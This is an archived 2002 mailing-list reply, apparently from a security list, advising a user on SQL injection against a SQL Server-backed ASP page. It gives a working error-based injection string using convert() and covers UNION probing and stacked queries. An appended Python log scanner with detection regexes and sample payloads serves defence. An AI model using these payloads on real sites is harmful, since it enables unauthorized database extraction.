> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is
> incompatible with int
>
> I have tried
>
> union select username,1,1,.... (20+ columns) from table
> union select 1,username,1,1....
> union select 1,1,username,1...

Yeah, that can eat up some time. Try using the convert() hack to get the result of your query back in an error message. Assuming that you're dealing with a quoted vulnerability, try this injection string:

' %2b convert(int, (SELECT TOP 1 fieldname FROM table WHERE fieldname NOT IN ('knownvalue', 'knownvalue2'))) %2b '

You should get a convert error back that includes the result of the subquery.

> I've also tried union select convert(sql_variant,username),1,1,...

I think sql_variant only works in the most recent version of SQL Server, so it may not even be a recognized data type.

> My second problem is that I cannot execute this:
> http://target/da.asp?userid=user' or 1=1; select * from information_schema.tables--

You're not likely to get the results of a stacked query in your returned page. Stacking queries is mostly useful for executing stored procedures.

Good luck.

Kevin Spett
SPI Dynamics, Inc.
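For defenders reviewing web server logs, the three request shapes discussed in this thread (UNION column probing, convert() inside a subquery, and stacked queries) can be flagged after URL-decoding the query string. This is an added example, not part of the original post; the log layout, the sample lines and the names `RULES`, `SAMPLE_LOG` and `scan` are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the three request shapes discussed in the thread.
RULES = {
    "convert_error": re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "stacked_query": re.compile(
        r";\s*(?:select|exec(?:ute)?|insert|update|delete|drop)\b", re.I),
}

# Constructed sample log (assumed fields: date time method uri-stem uri-query status).
SAMPLE_LOG = """\
2002-03-17 14:02:11 GET /da.asp userid=alice 200
2002-03-17 14:02:15 GET /da.asp userid=user'+union+select+username,1,1+from+table-- 500
2002-03-17 14:02:19 GET /da.asp userid='+%2b+convert(int,+(SELECT+TOP+1+fieldname+FROM+table))+%2b+' 500
2002-03-17 14:02:25 GET /da.asp userid=user'+or+1=1;+select+*+from+information_schema.tables-- 200
2002-03-17 14:02:30 GET /da.asp userid=student+union+rep 200
""".splitlines()


def scan(lines):
    """Return one finding per request whose decoded query matches a rule."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) != 6:
            continue  # skip malformed lines
        _date, _time, _method, stem, query, status = fields
        decoded = unquote_plus(query)  # '+' -> space, then %2b -> '+'
        rules = [name for name, rx in RULES.items() if rx.search(decoded)]
        if rules:
            findings.append({
                "stem": stem,
                "status": int(status),
                "rules": rules,
                # A 5xx next to a hit suggests a database error reached the client.
                "error_returned": status.startswith("5"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on the decoded query matters because the encoded form (`%2b`, `+` for spaces) would slip past a pattern written against the raw SQL text.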
This archive was generated by hypermail 2b30 : Sun Mar 17 2002 - 14:51:24 PST